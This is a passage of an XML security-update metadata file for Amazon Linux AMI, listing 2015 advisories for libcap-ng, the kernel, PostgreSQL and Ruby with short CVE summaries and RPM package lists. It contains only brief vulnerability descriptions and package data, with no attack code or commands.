</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0247" title="" id="CVE-2015-0247" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcom_err" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-debuginfo-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="libcom_err-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-devel-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-devel-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="libss-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-devel-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-libs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-libs-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="4.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-static-1.42.12-4.35.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-devel-1.42.12-4.35.amzn1.i686.rpm</filename></package><package 
name="libcom_err-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-devel-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs-static" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-static-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs-libs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-libs-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="libcom_err" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-debuginfo-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="libss-devel" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libss-devel-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="e2fsprogs" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-1.42.12-4.35.amzn1.i686.rpm</filename></package><package name="libss" version="1.42.12" release="4.35.amzn1" epoch="0" arch="i686"><filename>Packages/libss-1.42.12-4.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-543</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-543: medium priority package update for libcap-ng</title><issued date="2015-06-16 10:27:00" /><updated date="2015-06-16 11:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3215:
A flaw was found in the way seunshare, a utility for running executables under a different security context, used the capng_lock functionality of the libcap-ng library. The subsequent invocation of suid root binaries that relied on the fact that the setuid() system call, among others, also sets the saved set-user-ID when dropping the binaries' process privileges, could allow a local, unprivileged user to potentially escalate their privileges on the system. Note: the fix for this issue is the kernel part of the overall fix, and introduces the PR_SET_NO_NEW_PRIVS functionality and the related SELinux exec transitions support.
1095855:
CVE-2014-3215 policycoreutils: local privilege escalation via seunshare
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3215" title="" id="CVE-2014-3215" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcap-ng" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-debuginfo" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-debuginfo-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-python" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-python-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-devel" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-devel-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-utils" version="0.7.3" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcap-ng-utils-0.7.3-5.13.amzn1.x86_64.rpm</filename></package><package name="libcap-ng-utils" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-utils-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng-python" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-python-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng-debuginfo" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-debuginfo-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng" version="0.7.3" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libcap-ng-0.7.3-5.13.amzn1.i686.rpm</filename></package><package name="libcap-ng-devel" version="0.7.3" release="5.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/libcap-ng-devel-0.7.3-5.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-544</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-544: medium priority package update for kernel</title><issued date="2015-06-16 10:28:00" /><updated date="2015-06-16 11:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3215:
A flaw was found in the way seunshare, a utility for running executables under a different security context, used the capng_lock functionality of the libcap-ng library. The subsequent invocation of suid root binaries that relied on the fact that the setuid() system call, among others, also sets the saved set-user-ID when dropping the binaries' process privileges, could allow a local, unprivileged user to potentially escalate their privileges on the system. Note: the fix for this issue is the kernel part of the overall fix, and introduces the PR_SET_NO_NEW_PRIVS functionality and the related SELinux exec transitions support.
1095855:
CVE-2014-3215 policycoreutils: local privilege escalation via seunshare
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3215" title="" id="CVE-2014-3215" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.44" release="32.39.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.44-32.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.44" release="32.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.44-32.39.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.44" release="32.39.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-3.14.44-32.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-545</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-545: medium priority package update for postgresql92</title><issued date="2015-06-16 10:29:00" /><updated date="2015-06-16 11:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3165:
Double free vulnerability in PostgreSQL before 9.0.20, 9.1.x before 9.1.16, 9.2.x before 9.2.11, 9.3.x before 9.3.7, and 9.4.x before 9.4.2 allows remote attackers to cause a denial of service (crash) by closing an SSL session at a time when the authentication timeout will expire during the session shutdown sequence.
1221537:
CVE-2015-3165 postgresql: double-free after authentication timeout
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3165" title="" id="CVE-2015-3165" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-contrib" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.13" release="1.54.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.13-1.54.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.13-1.54.amzn1.i686.rpm</filename></package><package 
name="postgresql92-server" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.13-1.54.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.13" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.13-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-546</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-546: medium priority package update for postgresql93</title><issued date="2015-06-16 10:29:00" /><updated date="2015-06-16 11:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3165:
Double free vulnerability in PostgreSQL before 9.0.20, 9.1.x before 9.1.16, 9.2.x before 9.2.11, 9.3.x before 9.3.7, and 9.4.x before 9.4.2 allows remote attackers to cause a denial of service (crash) by closing an SSL session at a time when the authentication timeout will expire during the session shutdown sequence.
1221537:
CVE-2015-3165 postgresql: double-free after authentication timeout
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3165" title="" id="CVE-2015-3165" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-docs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.9" release="1.58.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql93-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.9-1.58.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.9" release="1.58.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql93-test-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.9-1.58.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.9" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.9-1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-547</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-547: medium priority package update for ruby20</title><issued date="2015-06-16 10:30:00" /><updated date="2015-06-18 20:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4020:
Incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.
CVE-2015-3900:
RubyGems did not validate the hostname returned in the SRV record before sending requests to it.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900" title="" id="CVE-2015-3900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4020" title="" id="CVE-2015-4020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-debuginfo" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.27.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.645-1.27.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.27.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.27.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.27.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" 
version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.645-1.27.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.645-1.27.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.27.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.27.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.645-1.27.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-548</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-548: medium priority package update for ruby21</title><issued date="2015-06-16 10:30:00" /><updated date="2015-06-18 20:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2015-4020:
Incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.
CVE-2015-3900:
RubyGems did not validate the hostname returned in the SRV record before sending requests to it.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900" title="" id="CVE-2015-3900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4020" title="" id="CVE-2015-4020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems21" version="2.2.3" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.3-1.17.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.3" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.3-1.17.amzn1.noarch.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.6-1.17.amzn1.noarch.rpm</filename></package><package name="ruby21-irb" version="2.1.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.6-1.17.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby21-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.17.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.17.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.17.amzn1" 